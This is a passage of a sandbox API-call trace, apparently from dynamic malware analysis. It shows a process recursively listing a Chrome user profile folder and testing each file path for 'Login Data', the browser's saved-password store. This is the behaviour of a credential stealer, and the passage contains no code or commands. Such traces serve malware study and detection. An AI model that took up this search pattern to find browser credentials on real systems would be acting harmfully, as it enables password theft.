dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.880] GetProcessHeap () returned 0x8e0000 [0162.880] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.880] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80ee3600, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80ee3600, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8c6cde50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x20000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visited Links", cAlternateFileName="VISITE~1")) returned 1 [0162.880] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.880] lstrlenW (lpString="\\") returned 1 [0162.880] GetProcessHeap () returned 0x8e0000 [0162.880] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.880] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.880] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.880] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.880] lstrlenW (lpString="Visited Links") returned 13 [0162.880] GetProcessHeap () returned 0x8e0000 [0162.880] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb4) returned 0x925550 [0162.880] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.880] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Visited Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links" [0162.880] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.880] GetProcessHeap () returned 0x8e0000 [0162.880] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.880] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links", lpSrch="Login Data") returned 0x0 [0162.880] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.880] GetProcessHeap () returned 0x8e0000 [0162.880] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.880] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x868593b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x868593b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x868593b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Applications", cAlternateFileName="WEBAPP~1")) returned 1 [0162.880] lstrcmpiW (lpString1="Web Applications", lpString2=".") returned 1 [0162.880] lstrcmpiW (lpString1="Web Applications", lpString2="..") returned 1 [0162.880] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.880] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.880] lstrlenW (lpString="\\") returned 1 [0162.881] GetProcessHeap () returned 0x8e0000 [0162.881] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.881] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.881] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.881] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.881] lstrlenW (lpString="Web Applications") returned 16 [0162.881] GetProcessHeap () returned 0x8e0000 [0162.881] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x925550 [0162.881] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.881] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Web Applications" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications" [0162.881] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.881] GetProcessHeap () returned 0x8e0000 [0162.881] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.881] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications") returned 92 [0162.881] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications") returned 92 [0162.881] lstrlenW (lpString="\\*.*") returned 4 [0162.881] GetProcessHeap () returned 0x8e0000 [0162.881] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc2) returned 0x925618 [0162.881] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications" [0162.881] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\*.*" [0162.881] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\*.*", lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x868593b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x868593b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x868593b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0162.881] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0162.881] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x868593b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x868593b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x868593b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.881] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0162.881] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0162.882] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x868593b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86989eb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86989eb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_crx_aohghmighlieiainnegkcijnfilokake", cAlternateFileName="_CRX_A~1")) returned 1 [0162.882] lstrcmpiW (lpString1="_crx_aohghmighlieiainnegkcijnfilokake", lpString2=".") returned 1 [0162.882] lstrcmpiW (lpString1="_crx_aohghmighlieiainnegkcijnfilokake", lpString2="..") returned 1 [0162.882] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications") returned 92 [0162.882] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications") returned 92 [0162.882] lstrlenW (lpString="\\") returned 1 [0162.882] GetProcessHeap () returned 0x8e0000 [0162.882] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xbc) returned 0x9256e8 [0162.882] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications" [0162.882] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\" [0162.882] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\") returned 93 [0162.882] lstrlenW (lpString="_crx_aohghmighlieiainnegkcijnfilokake") returned 37 [0162.882] GetProcessHeap () returned 0x8e0000 [0162.882] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x106) returned 0x9257b0 [0162.882] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\" [0162.882] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\", lpString2="_crx_aohghmighlieiainnegkcijnfilokake" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake" [0162.882] VirtualQuery (in: lpAddress=0x9256e8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.882] GetProcessHeap () returned 0x8e0000 [0162.882] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256e8 | out: hHeap=0x8e0000) returned 1 [0162.882] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake") returned 130 [0162.882] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake") returned 130 [0162.882] lstrlenW (lpString="\\*.*") returned 4 [0162.882] GetProcessHeap () returned 0x8e0000 [0162.882] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x10e) returned 0x9258c0 [0162.882] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake" [0162.882] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\*.*" [0162.882] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\*.*", lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x868593b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86989eb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86989eb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e0000, dwReserved1=0x8e0150, cFileName=".", cAlternateFileName="")) returned 0x8f9b40 [0162.886] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0162.886] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x868593b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86989eb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86989eb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e0000, dwReserved1=0x8e0150, cFileName="..", cAlternateFileName="")) returned 1 [0162.886] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0162.886] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0162.886] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8687f510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8687f510, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8687f510, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x28df6, dwReserved0=0x8e0000, dwReserved1=0x8e0150, cFileName="Google Docs.ico", cAlternateFileName="GOOGLE~1.ICO")) returned 1 [0162.886] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake") returned 130 [0162.886] lstrlenW (lpString="\\") returned 1 [0162.886] GetProcessHeap () returned 0x8e0000 [0162.886] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x108) returned 0x9259d8 [0162.886] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake" [0162.886] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\" [0162.886] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\") returned 131 [0162.886] lstrlenW (lpString="Google Docs.ico") returned 15 [0162.886] GetProcessHeap () returned 0x8e0000 [0162.886] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x126) returned 0x925ae8 [0162.886] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\" [0162.886] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\", lpString2="Google Docs.ico" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico" [0162.886] VirtualQuery (in: lpAddress=0x9259d8, lpBuffer=0x2dee18, dwLength=0x1c | out: lpBuffer=0x2dee18*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.886] GetProcessHeap () returned 0x8e0000 [0162.886] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9259d8 | out: hHeap=0x8e0000) returned 1 [0162.886] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico", lpSrch="Login Data") returned 0x0 [0162.886] VirtualQuery (in: lpAddress=0x925ae8, lpBuffer=0x2dee24, dwLength=0x1c | out: lpBuffer=0x2dee24*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.886] GetProcessHeap () returned 0x8e0000 [0162.886] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925ae8 | out: hHeap=0x8e0000) returned 1 [0162.887] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86989eb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86989eb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86989eb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x8e0000, dwReserved1=0x8e0150, cFileName="Google Docs.ico.md5", cAlternateFileName="GOOGLE~1.MD5")) returned 1 [0162.887] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake") returned 130 [0162.887] lstrlenW (lpString="\\") returned 1 [0162.887] GetProcessHeap () returned 0x8e0000 [0162.887] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x108) returned 0x9259d8 [0162.887] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake" [0162.887] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\" [0162.887] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\") returned 131 [0162.887] lstrlenW (lpString="Google Docs.ico.md5") returned 19 [0162.887] GetProcessHeap () returned 0x8e0000 [0162.887] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x12e) returned 0x925ae8 [0162.887] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\" [0162.887] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\", lpString2="Google Docs.ico.md5" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5" [0162.887] VirtualQuery (in: lpAddress=0x9259d8, lpBuffer=0x2dee18, dwLength=0x1c | out: lpBuffer=0x2dee18*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.887] GetProcessHeap () returned 0x8e0000 [0162.887] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9259d8 | out: hHeap=0x8e0000) returned 1 [0162.887] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5", lpSrch="Login Data") returned 0x0 [0162.887] VirtualQuery (in: lpAddress=0x925ae8, lpBuffer=0x2dee24, dwLength=0x1c | out: lpBuffer=0x2dee24*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.887] GetProcessHeap () returned 0x8e0000 [0162.887] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925ae8 | out: hHeap=0x8e0000) returned 1 [0162.887] FindNextFileW 